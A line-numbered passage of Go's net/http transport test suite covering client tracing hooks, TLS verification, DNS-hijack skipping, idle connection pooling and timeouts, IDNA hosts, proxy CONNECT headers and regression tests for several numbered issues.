3966 t.Errorf("expected substring %q at least once in output.", sub)
3967 }
3968 }
3969 wantOnce("Getting conn for dns-is-faked.golang:" + port)
3970 wantOnce("DNS start: {Host:dns-is-faked.golang}")
3971 wantOnce("DNS done: {Addrs:[{IP:" + ip + " Zone:}] Err:<nil> Coalesced:false}")
3972 wantOnce("got conn: {")
3973 wantOnceOrMore("Connecting to tcp " + addrStr)
3974 wantOnceOrMore("connected to tcp " + addrStr + " = <nil>")
3975 wantOnce("Reused:false WasIdle:false IdleTime:0s")
3976 wantOnce("first response byte")
3977 if h2 {
3978 wantOnce("tls handshake start")
3979 wantOnce("tls handshake done")
3980 } else {
3981 wantOnce("PutIdleConn = <nil>")
3982 wantOnce("WroteHeaderField: User-Agent: [Go-http-client/1.1]")
3983 // TODO(meirf): issue 19761. Make these agnostic to h1/h2. (These are not h1 specific, but the
3984 // WroteHeaderField hook is not yet implemented in h2.)
3985 wantOnce(fmt.Sprintf("WroteHeaderField: Host: [dns-is-faked.golang:%s]", port))
3986 wantOnce(fmt.Sprintf("WroteHeaderField: Content-Length: [%d]", len(body)))
3987 wantOnce("WroteHeaderField: X-Foo-Multiple-Vals: [bar baz]")
3988 wantOnce("WroteHeaderField: Accept-Encoding: [gzip]")
3989 }
3990 wantOnce("WroteHeaders")
3991 wantOnce("Wait100Continue")
3992 wantOnce("Got100Continue")
3993 wantOnce("WroteRequest: {Err:<nil>}")
3994 if strings.Contains(got, " to udp ") {
3995 t.Errorf("should not see UDP (DNS) connections")
3996 }
3997 if t.Failed() {
3998 t.Errorf("Output:\n%s", got)
3999 }
4000
4001 // And do a second request:
4002 req, _ = NewRequest("GET", cst.scheme()+"://dns-is-faked.golang:"+port, nil)
4003 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
4004 res, err = cst.c.Do(req)
4005 if err != nil {
4006 t.Fatal(err)
4007 }
4008 if res.StatusCode != 200 {
4009 t.Fatal(res.Status)
4010 }
4011 res.Body.Close()
4012
4013 mu.Lock()
4014 got = buf.String()
4015 mu.Unlock()
4016
4017 sub := "Getting conn for dns-is-faked.golang:"
4018 if gotn, want := strings.Count(got, sub), 2; gotn != want {
4019 t.Errorf("substring %q appeared %d times; want %d. Log:\n%s", sub, gotn, want, got)
4020 }
4021
4022 }
4023
4024 func TestTransportEventTraceTLSVerify(t *testing.T) {
4025 var mu sync.Mutex
4026 var buf bytes.Buffer
4027 logf := func(format string, args ...interface{}) {
4028 mu.Lock()
4029 defer mu.Unlock()
4030 fmt.Fprintf(&buf, format, args...)
4031 buf.WriteByte('\n')
4032 }
4033
4034 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4035 t.Error("Unexpected request")
4036 }))
4037 defer ts.Close()
4038 ts.Config.ErrorLog = log.New(funcWriter(func(p []byte) (int, error) {
4039 logf("%s", p)
4040 return len(p), nil
4041 }), "", 0)
4042
4043 certpool := x509.NewCertPool()
4044 certpool.AddCert(ts.Certificate())
4045
4046 c := &Client{Transport: &Transport{
4047 TLSClientConfig: &tls.Config{
4048 ServerName: "dns-is-faked.golang",
4049 RootCAs: certpool,
4050 },
4051 }}
4052
4053 trace := &httptrace.ClientTrace{
4054 TLSHandshakeStart: func() { logf("TLSHandshakeStart") },
4055 TLSHandshakeDone: func(s tls.ConnectionState, err error) {
4056 logf("TLSHandshakeDone: ConnectionState = %v \n err = %v", s, err)
4057 },
4058 }
4059
4060 req, _ := NewRequest("GET", ts.URL, nil)
4061 req = req.WithContext(httptrace.WithClientTrace(context.Background(), trace))
4062 _, err := c.Do(req)
4063 if err == nil {
4064 t.Error("Expected request to fail TLS verification")
4065 }
4066
4067 mu.Lock()
4068 got := buf.String()
4069 mu.Unlock()
4070
4071 wantOnce := func(sub string) {
4072 if strings.Count(got, sub) != 1 {
4073 t.Errorf("expected substring %q exactly once in output.", sub)
4074 }
4075 }
4076
4077 wantOnce("TLSHandshakeStart")
4078 wantOnce("TLSHandshakeDone")
4079 wantOnce("err = x509: certificate is valid for example.com")
4080
4081 if t.Failed() {
4082 t.Errorf("Output:\n%s", got)
4083 }
4084 }
4085
4086 var (
4087 isDNSHijackedOnce sync.Once
4088 isDNSHijacked bool
4089 )
4090
4091 func skipIfDNSHijacked(t *testing.T) {
4092 // Skip this test if the user is using a shady/ISP
4093 // DNS server hijacking queries.
4094 // See issues 16732, 16716.
4095 isDNSHijackedOnce.Do(func() {
4096 addrs, _ := net.LookupHost("dns-should-not-resolve.golang")
4097 isDNSHijacked = len(addrs) != 0
4098 })
4099 if isDNSHijacked {
4100 t.Skip("skipping; test requires non-hijacking DNS server")
4101 }
4102 }
4103
4104 func TestTransportEventTraceRealDNS(t *testing.T) {
4105 skipIfDNSHijacked(t)
4106 defer afterTest(t)
4107 tr := &Transport{}
4108 defer tr.CloseIdleConnections()
4109 c := &Client{Transport: tr}
4110
4111 var mu sync.Mutex // guards buf
4112 var buf bytes.Buffer
4113 logf := func(format string, args ...interface{}) {
4114 mu.Lock()
4115 defer mu.Unlock()
4116 fmt.Fprintf(&buf, format, args...)
4117 buf.WriteByte('\n')
4118 }
4119
4120 req, _ := NewRequest("GET", "http://dns-should-not-resolve.golang:80", nil)
4121 trace := &httptrace.ClientTrace{
4122 DNSStart: func(e httptrace.DNSStartInfo) { logf("DNSStart: %+v", e) },
4123 DNSDone: func(e httptrace.DNSDoneInfo) { logf("DNSDone: %+v", e) },
4124 ConnectStart: func(network, addr string) { logf("ConnectStart: %s %s", network, addr) },
4125 ConnectDone: func(network, addr string, err error) { logf("ConnectDone: %s %s %v", network, addr, err) },
4126 }
4127 req = req.WithContext(httptrace.WithClientTrace(context.Background(), trace))
4128
4129 resp, err := c.Do(req)
4130 if err == nil {
4131 resp.Body.Close()
4132 t.Fatal("expected error during DNS lookup")
4133 }
4134
4135 mu.Lock()
4136 got := buf.String()
4137 mu.Unlock()
4138
4139 wantSub := func(sub string) {
4140 if !strings.Contains(got, sub) {
4141 t.Errorf("expected substring %q in output.", sub)
4142 }
4143 }
4144 wantSub("DNSStart: {Host:dns-should-not-resolve.golang}")
4145 wantSub("DNSDone: {Addrs:[] Err:")
4146 if strings.Contains(got, "ConnectStart") || strings.Contains(got, "ConnectDone") {
4147 t.Errorf("should not see Connect events")
4148 }
4149 if t.Failed() {
4150 t.Errorf("Output:\n%s", got)
4151 }
4152 }
4153
4154 // Issue 14353: port can only contain digits.
4155 func TestTransportRejectsAlphaPort(t *testing.T) {
4156 res, err := Get("http://dummy.tld:123foo/bar")
4157 if err == nil {
4158 res.Body.Close()
4159 t.Fatal("unexpected success")
4160 }
4161 ue, ok := err.(*url.Error)
4162 if !ok {
4163 t.Fatalf("got %#v; want *url.Error", err)
4164 }
4165 got := ue.Err.Error()
4166 want := `invalid URL port "123foo"`
4167 if got != want {
4168 t.Errorf("got error %q; want %q", got, want)
4169 }
4170 }
4171
4172 // Test the httptrace.TLSHandshake{Start,Done} hooks with an HTTPS HTTP/1
4173 // connection. The HTTP/2 test is done in TestTransportEventTrace_h2.
4174 func TestTLSHandshakeTrace(t *testing.T) {
4175 defer afterTest(t)
4176 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {}))
4177 defer ts.Close()
4178
4179 var mu sync.Mutex
4180 var start, done bool
4181 trace := &httptrace.ClientTrace{
4182 TLSHandshakeStart: func() {
4183 mu.Lock()
4184 defer mu.Unlock()
4185 start = true
4186 },
4187 TLSHandshakeDone: func(s tls.ConnectionState, err error) {
4188 mu.Lock()
4189 defer mu.Unlock()
4190 done = true
4191 if err != nil {
4192 t.Fatal("Expected error to be nil but was:", err)
4193 }
4194 },
4195 }
4196
4197 c := ts.Client()
4198 req, err := NewRequest("GET", ts.URL, nil)
4199 if err != nil {
4200 t.Fatal("Unable to construct test request:", err)
4201 }
4202 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
4203
4204 r, err := c.Do(req)
4205 if err != nil {
4206 t.Fatal("Unexpected error making request:", err)
4207 }
4208 r.Body.Close()
4209 mu.Lock()
4210 defer mu.Unlock()
4211 if !start {
4212 t.Fatal("Expected TLSHandshakeStart to be called, but wasn't")
4213 }
4214 if !done {
4215 t.Fatal("Expected TLSHandshakeDone to be called, but wasnt't")
4216 }
4217 }
4218
4219 func TestTransportMaxIdleConns(t *testing.T) {
4220 defer afterTest(t)
4221 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4222 // No body for convenience.
4223 }))
4224 defer ts.Close()
4225 c := ts.Client()
4226 tr := c.Transport.(*Transport)
4227 tr.MaxIdleConns = 4
4228
4229 ip, port, err := net.SplitHostPort(ts.Listener.Addr().String())
4230 if err != nil {
4231 t.Fatal(err)
4232 }
4233 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, _, host string) ([]net.IPAddr, error) {
4234 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
4235 })
4236
4237 hitHost := func(n int) {
4238 req, _ := NewRequest("GET", fmt.Sprintf("http://host-%d.dns-is-faked.golang:"+port, n), nil)
4239 req = req.WithContext(ctx)
4240 res, err := c.Do(req)
4241 if err != nil {
4242 t.Fatal(err)
4243 }
4244 res.Body.Close()
4245 }
4246 for i := 0; i < 4; i++ {
4247 hitHost(i)
4248 }
4249 want := []string{
4250 "|http|host-0.dns-is-faked.golang:" + port,
4251 "|http|host-1.dns-is-faked.golang:" + port,
4252 "|http|host-2.dns-is-faked.golang:" + port,
4253 "|http|host-3.dns-is-faked.golang:" + port,
4254 }
4255 if got := tr.IdleConnKeysForTesting(); !reflect.DeepEqual(got, want) {
4256 t.Fatalf("idle conn keys mismatch.\n got: %q\nwant: %q\n", got, want)
4257 }
4258
4259 // Now hitting the 5th host should kick out the first host:
4260 hitHost(4)
4261 want = []string{
4262 "|http|host-1.dns-is-faked.golang:" + port,
4263 "|http|host-2.dns-is-faked.golang:" + port,
4264 "|http|host-3.dns-is-faked.golang:" + port,
4265 "|http|host-4.dns-is-faked.golang:" + port,
4266 }
4267 if got := tr.IdleConnKeysForTesting(); !reflect.DeepEqual(got, want) {
4268 t.Fatalf("idle conn keys mismatch after 5th host.\n got: %q\nwant: %q\n", got, want)
4269 }
4270 }
4271
4272 func TestTransportIdleConnTimeout_h1(t *testing.T) { testTransportIdleConnTimeout(t, h1Mode) }
4273 func TestTransportIdleConnTimeout_h2(t *testing.T) { testTransportIdleConnTimeout(t, h2Mode) }
4274 func testTransportIdleConnTimeout(t *testing.T, h2 bool) {
4275 if testing.Short() {
4276 t.Skip("skipping in short mode")
4277 }
4278 defer afterTest(t)
4279
4280 const timeout = 1 * time.Second
4281
4282 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
4283 // No body for convenience.
4284 }))
4285 defer cst.close()
4286 tr := cst.tr
4287 tr.IdleConnTimeout = timeout
4288 defer tr.CloseIdleConnections()
4289 c := &Client{Transport: tr}
4290
4291 idleConns := func() []string {
4292 if h2 {
4293 return tr.IdleConnStrsForTesting_h2()
4294 } else {
4295 return tr.IdleConnStrsForTesting()
4296 }
4297 }
4298
4299 var conn string
4300 doReq := func(n int) {
4301 req, _ := NewRequest("GET", cst.ts.URL, nil)
4302 req = req.WithContext(httptrace.WithClientTrace(context.Background(), &httptrace.ClientTrace{
4303 PutIdleConn: func(err error) {
4304 if err != nil {
4305 t.Errorf("failed to keep idle conn: %v", err)
4306 }
4307 },
4308 }))
4309 res, err := c.Do(req)
4310 if err != nil {
4311 t.Fatal(err)
4312 }
4313 res.Body.Close()
4314 conns := idleConns()
4315 if len(conns) != 1 {
4316 t.Fatalf("req %v: unexpected number of idle conns: %q", n, conns)
4317 }
4318 if conn == "" {
4319 conn = conns[0]
4320 }
4321 if conn != conns[0] {
4322 t.Fatalf("req %v: cached connection changed; expected the same one throughout the test", n)
4323 }
4324 }
4325 for i := 0; i < 3; i++ {
4326 doReq(i)
4327 time.Sleep(timeout / 2)
4328 }
4329 time.Sleep(timeout * 3 / 2)
4330 if got := idleConns(); len(got) != 0 {
4331 t.Errorf("idle conns = %q; want none", got)
4332 }
4333 }
4334
4335 // Issue 16208: Go 1.7 crashed after Transport.IdleConnTimeout if an
4336 // HTTP/2 connection was established but its caller no longer
4337 // wanted it. (Assuming the connection cache was enabled, which it is
4338 // by default)
4339 //
4340 // This test reproduced the crash by setting the IdleConnTimeout low
4341 // (to make the test reasonable) and then making a request which is
4342 // canceled by the DialTLS hook, which then also waits to return the
4343 // real connection until after the RoundTrip saw the error. Then we
4344 // know the successful tls.Dial from DialTLS will need to go into the
4345 // idle pool. Then we give it a bit of time to explode.
4346 func TestIdleConnH2Crash(t *testing.T) {
4347 setParallel(t)
4348 cst := newClientServerTest(t, h2Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4349 // nothing
4350 }))
4351 defer cst.close()
4352
4353 ctx, cancel := context.WithCancel(context.Background())
4354 defer cancel()
4355
4356 sawDoErr := make(chan bool, 1)
4357 testDone := make(chan struct{})
4358 defer close(testDone)
4359
4360 cst.tr.IdleConnTimeout = 5 * time.Millisecond
4361 cst.tr.DialTLS = func(network, addr string) (net.Conn, error) {
4362 c, err := tls.Dial(network, addr, &tls.Config{
4363 InsecureSkipVerify: true,
4364 NextProtos: []string{"h2"},
4365 })
4366 if err != nil {
4367 t.Error(err)
4368 return nil, err
4369 }
4370 if cs := c.ConnectionState(); cs.NegotiatedProtocol != "h2" {
4371 t.Errorf("protocol = %q; want %q", cs.NegotiatedProtocol, "h2")
4372 c.Close()
4373 return nil, errors.New("bogus")
4374 }
4375
4376 cancel()
4377
4378 failTimer := time.NewTimer(5 * time.Second)
4379 defer failTimer.Stop()
4380 select {
4381 case <-sawDoErr:
4382 case <-testDone:
4383 case <-failTimer.C:
4384 t.Error("timeout in DialTLS, waiting too long for cst.c.Do to fail")
4385 }
4386 return c, nil
4387 }
4388
4389 req, _ := NewRequest("GET", cst.ts.URL, nil)
4390 req = req.WithContext(ctx)
4391 res, err := cst.c.Do(req)
4392 if err == nil {
4393 res.Body.Close()
4394 t.Fatal("unexpected success")
4395 }
4396 sawDoErr <- true
4397
4398 // Wait for the explosion.
4399 time.Sleep(cst.tr.IdleConnTimeout * 10)
4400 }
4401
4402 type funcConn struct {
4403 net.Conn
4404 read func([]byte) (int, error)
4405 write func([]byte) (int, error)
4406 }
4407
4408 func (c funcConn) Read(p []byte) (int, error) { return c.read(p) }
4409 func (c funcConn) Write(p []byte) (int, error) { return c.write(p) }
4410 func (c funcConn) Close() error { return nil }
4411
4412 // Issue 16465: Transport.RoundTrip should return the raw net.Conn.Read error from Peek
4413 // back to the caller.
4414 func TestTransportReturnsPeekError(t *testing.T) {
4415 errValue := errors.New("specific error value")
4416
4417 wrote := make(chan struct{})
4418 var wroteOnce sync.Once
4419
4420 tr := &Transport{
4421 Dial: func(network, addr string) (net.Conn, error) {
4422 c := funcConn{
4423 read: func([]byte) (int, error) {
4424 <-wrote
4425 return 0, errValue
4426 },
4427 write: func(p []byte) (int, error) {
4428 wroteOnce.Do(func() { close(wrote) })
4429 return len(p), nil
4430 },
4431 }
4432 return c, nil
4433 },
4434 }
4435 _, err := tr.RoundTrip(httptest.NewRequest("GET", "http://fake.tld/", nil))
4436 if err != errValue {
4437 t.Errorf("error = %#v; want %v", err, errValue)
4438 }
4439 }
4440
4441 // Issue 13835: international domain names should work
4442 func TestTransportIDNA_h1(t *testing.T) { testTransportIDNA(t, h1Mode) }
4443 func TestTransportIDNA_h2(t *testing.T) { testTransportIDNA(t, h2Mode) }
4444 func testTransportIDNA(t *testing.T, h2 bool) {
4445 defer afterTest(t)
4446
4447 const uniDomain = "гофер.го"
4448 const punyDomain = "xn--c1ae0ajs.xn--c1aw"
4449
4450 var port string
4451 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
4452 want := punyDomain + ":" + port
4453 if r.Host != want {
4454 t.Errorf("Host header = %q; want %q", r.Host, want)
4455 }
4456 if h2 {
4457 if r.TLS == nil {
4458 t.Errorf("r.TLS == nil")
4459 } else if r.TLS.ServerName != punyDomain {
4460 t.Errorf("TLS.ServerName = %q; want %q", r.TLS.ServerName, punyDomain)
4461 }
4462 }
4463 w.Header().Set("Hit-Handler", "1")
4464 }))
4465 defer cst.close()
4466
4467 ip, port, err := net.SplitHostPort(cst.ts.Listener.Addr().String())
4468 if err != nil {
4469 t.Fatal(err)
4470 }
4471
4472 // Install a fake DNS server.
4473 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, network, host string) ([]net.IPAddr, error) {
4474 if host != punyDomain {
4475 t.Errorf("got DNS host lookup for %q/%q; want %q", network, host, punyDomain)
4476 return nil, nil
4477 }
4478 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
4479 })
4480
4481 req, _ := NewRequest("GET", cst.scheme()+"://"+uniDomain+":"+port, nil)
4482 trace := &httptrace.ClientTrace{
4483 GetConn: func(hostPort string) {
4484 want := net.JoinHostPort(punyDomain, port)
4485 if hostPort != want {
4486 t.Errorf("getting conn for %q; want %q", hostPort, want)
4487 }
4488 },
4489 DNSStart: func(e httptrace.DNSStartInfo) {
4490 if e.Host != punyDomain {
4491 t.Errorf("DNSStart Host = %q; want %q", e.Host, punyDomain)
4492 }
4493 },
4494 }
4495 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
4496
4497 res, err := cst.tr.RoundTrip(req)
4498 if err != nil {
4499 t.Fatal(err)
4500 }
4501 defer res.Body.Close()
4502 if res.Header.Get("Hit-Handler") != "1" {
4503 out, err := httputil.DumpResponse(res, true)
4504 if err != nil {
4505 t.Fatal(err)
4506 }
4507 t.Errorf("Response body wasn't from Handler. Got:\n%s\n", out)
4508 }
4509 }
4510
4511 // Issue 13290: send User-Agent in proxy CONNECT
4512 func TestTransportProxyConnectHeader(t *testing.T) {
4513 defer afterTest(t)
4514 reqc := make(chan *Request, 1)
4515 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4516 if r.Method != "CONNECT" {
4517 t.Errorf("method = %q; want CONNECT", r.Method)
4518 }
4519 reqc <- r
4520 c, _, err := w.(Hijacker).Hijack()
4521 if err != nil {
4522 t.Errorf("Hijack: %v", err)
4523 return
4524 }
4525 c.Close()
4526 }))
4527 defer ts.Close()
4528
4529 c := ts.Client()
4530 c.Transport.(*Transport).Proxy = func(r *Request) (*url.URL, error) {
4531 return url.Parse(ts.URL)
4532 }
4533 c.Transport.(*Transport).ProxyConnectHeader = Header{
4534 "User-Agent": {"foo"},
4535 "Other": {"bar"},
4536 }
4537
4538 res, err := c.Get("https://dummy.tld/") // https to force a CONNECT
4539 if err == nil {
4540 res.Body.Close()
4541 t.Errorf("unexpected success")
4542 }
4543 select {
4544 case <-time.After(3 * time.Second):
4545 t.Fatal("timeout")
4546 case r := <-reqc:
4547 if got, want := r.Header.Get("User-Agent"), "foo"; got != want {
4548 t.Errorf("CONNECT request User-Agent = %q; want %q", got, want)
4549 }
4550 if got, want := r.Header.Get("Other"), "bar"; got != want {
4551 t.Errorf("CONNECT request Other = %q; want %q", got, want)
4552 }
4553 }
4554 }
4555
4556 var errFakeRoundTrip = errors.New("fake roundtrip")
4557
4558 type funcRoundTripper func()
4559
4560 func (fn funcRoundTripper) RoundTrip(*Request) (*Response, error) {
4561 fn()
4562 return nil, errFakeRoundTrip
4563 }
4564
4565 func wantBody(res *Response, err error, want string) error {
4566 if err != nil {
4567 return err
4568 }
4569 slurp, err := ioutil.ReadAll(res.Body)
4570 if err != nil {
4571 return fmt.Errorf("error reading body: %v", err)
4572 }
4573 if string(slurp) != want {
4574 return fmt.Errorf("body = %q; want %q", slurp, want)
4575 }
4576 if err := res.Body.Close(); err != nil {
4577 return fmt.Errorf("body Close = %v", err)
4578 }
4579 return nil
4580 }
4581
4582 func newLocalListener(t *testing.T) net.Listener {
4583 ln, err := net.Listen("tcp", "127.0.0.1:0")
4584 if err != nil {
4585 ln, err = net.Listen("tcp6", "[::1]:0")
4586 }
4587 if err != nil {
4588 t.Fatal(err)
4589 }
4590 return ln
4591 }
4592
4593 type countCloseReader struct {
4594 n *int
4595 io.Reader
4596 }
4597
4598 func (cr countCloseReader) Close() error {
4599 (*cr.n)++
4600 return nil
4601 }
4602
4603 // rgz is a gzip quine that uncompresses to itself.
4604 var rgz = []byte{
4605 0x1f, 0x8b, 0x08, 0x08, 0x00, 0x00, 0x00, 0x00,
4606 0x00, 0x00, 0x72, 0x65, 0x63, 0x75, 0x72, 0x73,
4607 0x69, 0x76, 0x65, 0x00, 0x92, 0xef, 0xe6, 0xe0,
4608 0x60, 0x00, 0x83, 0xa2, 0xd4, 0xe4, 0xd2, 0xa2,
4609 0xe2, 0xcc, 0xb2, 0x54, 0x06, 0x00, 0x00, 0x17,
4610 0x00, 0xe8, 0xff, 0x92, 0xef, 0xe6, 0xe0, 0x60,
4611 0x00, 0x83, 0xa2, 0xd4, 0xe4, 0xd2, 0xa2, 0xe2,
4612 0xcc, 0xb2, 0x54, 0x06, 0x00, 0x00, 0x17, 0x00,
4613 0xe8, 0xff, 0x42, 0x12, 0x46, 0x16, 0x06, 0x00,
4614 0x05, 0x00, 0xfa, 0xff, 0x42, 0x12, 0x46, 0x16,
4615 0x06, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05,
4616 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
4617 0x42, 0x12, 0x46, 0x16, 0x06, 0x00, 0x05, 0x00,
4618 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00,
4619 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4,
4620 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88,
4621 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
4622 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00,
4623 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00,
4624 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4,
4625 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00,
4626 0x00, 0xff, 0xff, 0x00, 0x17, 0x00, 0xe8, 0xff,
4627 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00,
4628 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00,
4629 0x17, 0x00, 0xe8, 0xff, 0x42, 0x12, 0x46, 0x16,
4630 0x06, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x08,
4631 0x00, 0xf7, 0xff, 0x3d, 0xb1, 0x20, 0x85, 0xfa,
4632 0x00, 0x00, 0x00, 0x42, 0x12, 0x46, 0x16, 0x06,
4633 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x08, 0x00,
4634 0xf7, 0xff, 0x3d, 0xb1, 0x20, 0x85, 0xfa, 0x00,
4635 0x00, 0x00, 0x3d, 0xb1, 0x20, 0x85, 0xfa, 0x00,
4636 0x00, 0x00,
4637 }
4638
4639 // Ensure that a missing status doesn't make the client panic
4640 // See Issue https://golang.org/issues/21701
4641 func TestMissingStatusNoPanic(t *testing.T) {
4642 t.Parallel()
4643
4644 const want = "unknown status code"
4645
4646 ln := newLocalListener(t)
4647 addr := ln.Addr().String()
4648 shutdown := make(chan bool, 1)
4649 done := make(chan bool)
4650 fullAddrURL := fmt.Sprintf("http://%s", addr)
4651 raw := "HTTP/1.1 400\r\n" +
4652 "Date: Wed, 30 Aug 2017 19:09:27 GMT\r\n" +
4653 "Content-Type: text/html; charset=utf-8\r\n" +
4654 "Content-Length: 10\r\n" +
4655 "Last-Modified: Wed, 30 Aug 2017 19:02:02 GMT\r\n" +
4656 "Vary: Accept-Encoding\r\n\r\n" +
4657 "Aloha Olaa"
4658
4659 go func() {
4660 defer func() {
4661 ln.Close()
4662 close(done)
4663 }()
4664
4665 conn, _ := ln.Accept()
4666 if conn != nil {
4667 io.WriteString(conn, raw)
4668 ioutil.ReadAll(conn)
4669 conn.Close()
4670 }
4671 }()
4672
4673 proxyURL, err := url.Parse(fullAddrURL)
4674 if err != nil {
4675 t.Fatalf("proxyURL: %v", err)
4676 }
4677
4678 tr := &Transport{Proxy: ProxyURL(proxyURL)}
4679
4680 req, _ := NewRequest("GET", "https://golang.org/", nil)
4681 res, err, panicked := doFetchCheckPanic(tr, req)
4682 if panicked {
4683 t.Error("panicked, expecting an error")
4684 }
4685 if res != nil && res.Body != nil {
4686 io.Copy(ioutil.Discard, res.Body)
4687 res.Body.Close()
4688 }
4689
4690 if err == nil || !strings.Contains(err.Error(), want) {
4691 t.Errorf("got=%v want=%q", err, want)
4692 }
4693
4694 close(shutdown)
4695 <-done
4696 }
4697
4698 func doFetchCheckPanic(tr *Transport, req *Request) (res *Response, err error, panicked bool) {
4699 defer func() {
4700 if r := recover(); r != nil {
4701 panicked = true
4702 }
4703 }()
4704 res, err = tr.RoundTrip(req)
4705 return
4706 }
4707
4708 // Issue 22330: do not allow the response body to be read when the status code
4709 // forbids a response body.
4710 func TestNoBodyOnChunked304Response(t *testing.T) {
4711 defer afterTest(t)
4712 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4713 conn, buf, _ := w.(Hijacker).Hijack()
4714 buf.Write([]byte("HTTP/1.1 304 NOT MODIFIED\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"))
4715 buf.Flush()
4716 conn.Close()
4717 }))
4718 defer cst.close()
4719
4720 // Our test server above is sending back bogus data after the
4721 // response (the "0\r\n\r\n" part), which causes the Transport
4722 // code to log spam. Disable keep-alives so we never even try
4723 // to reuse the connection.
4724 cst.tr.DisableKeepAlives = true
4725
4726 res, err := cst.c.Get(cst.ts.URL)
4727 if err != nil {
4728 t.Fatal(err)
4729 }
4730
4731 if res.Body != NoBody {
4732 t.Errorf("Unexpected body on 304 response")
4733 }
4734 }
4735
4736 type funcWriter func([]byte) (int, error)
4737
4738 func (f funcWriter) Write(p []byte) (int, error) { return f(p) }
4739
4740 type doneContext struct {
4741 context.Context
4742 err error
4743 }
4744
4745 func (doneContext) Done() <-chan struct{} {
4746 c := make(chan struct{})
4747 close(c)
4748 return c
4749 }
4750
4751 func (d doneContext) Err() error { return d.err }
4752
4753 // Issue 25852: Transport should check whether Context is done early.
4754 func TestTransportCheckContextDoneEarly(t *testing.T) {
4755 tr := &Transport{}
4756 req, _ := NewRequest("GET", "http://fake.example/", nil)
4757 wantErr := errors.New("some error")
4758 req = req.WithContext(doneContext{context.Background(), wantErr})
4759 _, err := tr.RoundTrip(req)
4760 if err != wantErr {
4761 t.Errorf("error = %v; want %v", err, wantErr)
4762 }
4763 }
4764
4765 // Issue 23399: verify that if a client request times out, the Transport's
4766 // conn is closed so that it's not reused.
4767 //
4768 // This is the test variant that times out before the server replies with
4769 // any response headers.
4770 func TestClientTimeoutKillsConn_BeforeHeaders(t *testing.T) {
4771 setParallel(t)
4772 defer afterTest(t)
4773 inHandler := make(chan net.Conn, 1)
4774 handlerReadReturned := make(chan bool, 1)
4775 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4776 conn, _, err := w.(Hijacker).Hijack()
4777 if err != nil {
4778 t.Error(err)
4779 return
4780 }
4781 inHandler <- conn
4782 n, err := conn.Read([]byte{0})
4783 if n != 0 || err != io.EOF {
4784 t.Errorf("unexpected Read result: %v, %v", n, err)
4785 }
4786 handlerReadReturned <- true
4787 }))
4788 defer cst.close()
4789
4790 const timeout = 50 * time.Millisecond
4791 cst.c.Timeout = timeout
4792
4793 _, err := cst.c.Get(cst.ts.URL)
4794 if err == nil {
4795 t.Fatal("unexpected Get succeess")
4796 }
4797
4798 select {
4799 case c := <-inHandler:
4800 select {
4801 case <-handlerReadReturned:
4802 // Success.
4803 return
4804 case <-time.After(5 * time.Second):
4805 t.Error("Handler's conn.Read seems to be stuck in Read")
4806 c.Close() // close it to unblock Handler
4807 }
4808 case <-time.After(timeout * 10):
4809 // If we didn't get into the Handler in 50ms, that probably means
4810 // the builder was just slow and the Get failed in that time
4811 // but never made it to the server. That's fine. We'll usually
4812 // test the part above on faster machines.
4813 t.Skip("skipping test on slow builder")
4814 }
4815 }
4816
4817 // Issue 23399: verify that if a client request times out, the Transport's
4818 // conn is closed so that it's not reused.
4819 //
4820 // This is the test variant that has the server send response headers
4821 // first, and time out during the write of the response body.
4822 func TestClientTimeoutKillsConn_AfterHeaders(t *testing.T) {
4823 setParallel(t)
4824 defer afterTest(t)
4825 inHandler := make(chan net.Conn, 1)
4826 handlerResult := make(chan error, 1)
4827 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4828 w.Header().Set("Content-Length", "100")
4829 w.(Flusher).Flush()
4830 conn, _, err := w.(Hijacker).Hijack()
4831 if err != nil {
4832 t.Error(err)
4833 return
4834 }
4835 conn.Write([]byte("foo"))
4836 inHandler <- conn
4837 n, err := conn.Read([]byte{0})
4838 // The error should be io.EOF or "read tcp
4839 // 127.0.0.1:35827->127.0.0.1:40290: read: connection
4840 // reset by peer" depending on timing. Really we just
4841 // care that it returns at all. But if it returns with
4842 // data, that's weird.
4843 if n != 0 || err == nil {
4844 handlerResult <- fmt.Errorf("unexpected Read result: %v, %v", n, err)
4845 return
4846 }
4847 handlerResult <- nil
4848 }))
4849 defer cst.close()
4850
4851 // Set Timeout to something very long but non-zero to exercise
4852 // the codepaths that check for it. But rather than wait for it to fire
4853 // (which would make the test slow), we send on the req.Cancel channel instead,
4854 // which happens to exercise the same code paths.
